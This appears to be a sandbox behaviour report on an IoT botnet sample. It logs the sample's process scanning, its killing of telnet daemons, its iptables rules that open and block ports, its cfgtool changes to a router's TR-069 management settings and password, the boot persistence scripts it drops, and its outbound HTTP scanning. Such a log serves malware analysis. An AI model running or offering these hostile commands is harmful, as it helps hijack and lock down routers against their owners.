                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/111/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/232/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1579/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/112/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/233/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1699/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/113/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/234/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1335/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1698/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/114/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/235/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1334/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1576/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/2302/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/115/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/236/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/116/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/237/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/117/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/118/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/910/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/119/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/912/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/10/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/2307/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/11/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/918/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/6241/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/12/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/13/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/6243/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/14/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/15/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/16/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/17/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/18/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1594/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/120/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/121/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1349/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/122/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/243/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/123/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/2/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/124/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/3/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/4/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/125/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/126/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1344/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1465/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1586/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/127/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/6/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/248/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/128/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/249/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1463/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/800/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/9/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/801/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/6237/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/20/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/21/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1900/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/22/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/23/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/24/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/25/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/26/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/27/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/28/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/29/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/491/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/250/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/130/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/251/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/252/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/132/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/253/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/254/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/4508/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/255/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/256/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1599/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/257/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1477/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/379/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/258/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1476/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/259/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1475/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/6249/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/936/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/30/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/2208/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/35/statJump to behavior
                            Source: /usr/bin/killall (PID: 6250)File opened: /proc/1809/statJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6243)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6271)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6278)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6281)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6285)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6288)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6291)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6294)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6303)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6310)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6316)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6319)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6327)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6351)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6356)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6361)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6369)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6375)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6381)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6387)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6393)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6399)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6405)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6411)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6417)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6423)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6429)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6439)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6446)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6449)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6455)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6458)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6461)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6464)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPT"Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6470)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPT"Jump to behavior
                            Source: /bin/sh (PID: 6273)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6280)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6283)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6287)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6290)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6293)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6302)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6308)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 49999 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6315)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6318)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6324)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6350)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6366)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6374)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6380)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6386)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6392)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6398)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6404)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6410)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6416)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6422)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6428)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6434)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROPJump to behavior
                            Source: /bin/sh (PID: 6443)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6448)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6454)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6457)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6460)Iptables executable: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6463)Iptables executable: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6469)Iptables executable: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 1027 -j ACCEPTJump to behavior
                            Source: /bin/sh (PID: 6475)Iptables executable: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 1027 -j ACCEPTJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6259)Reads from proc file: /proc/statJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)File written: /usr/networksJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
                            Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/S95baby.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/keyboard-setup.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/console-setup.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /etc/init.d/hwclock.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /usr/bin/gettext.shJump to dropped file
                            Source: /tmp/bin.sh.elf (PID: 6241)File: /usr/bin/rescan-scsi-bus.shJump to dropped file
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34030 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36824 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34694 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54246 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53110 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60462 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51586 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37286 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49442 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53158 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47278 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50598 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52542 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55872 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45204 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49332 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50372 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37388 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35796 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43448 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49374 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36434 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53898 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40292 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59518 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51156 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39810 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44724 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49576 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51456 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35190 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40362 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58502 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45614 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40904 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40170 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45060 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47554 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52578 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55684 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36744 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47906 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44962 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48206 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47336 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36822 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33346 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55738 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36670 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55166 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42728 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46434 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45762 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51804 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35314 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45642 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37904 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42858 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47338 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59258 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59858 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41440 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59536 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51730 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59134 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54560 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54190 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46938 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53284 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50418 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43434 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59392 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54686 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41678 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53672 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34104 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45902 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53360 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52050 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37814 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47440 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54304 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34690 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47146 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45700 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54840 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49594 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52078 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44882 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41854 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48730 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32996 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58080 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51200 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39176 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60888 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53488 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57912 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52944 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47612 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34970 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44728 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51426 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54388 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33120 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37312 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44998 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59688 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47284 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41420 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51114 -> 37215
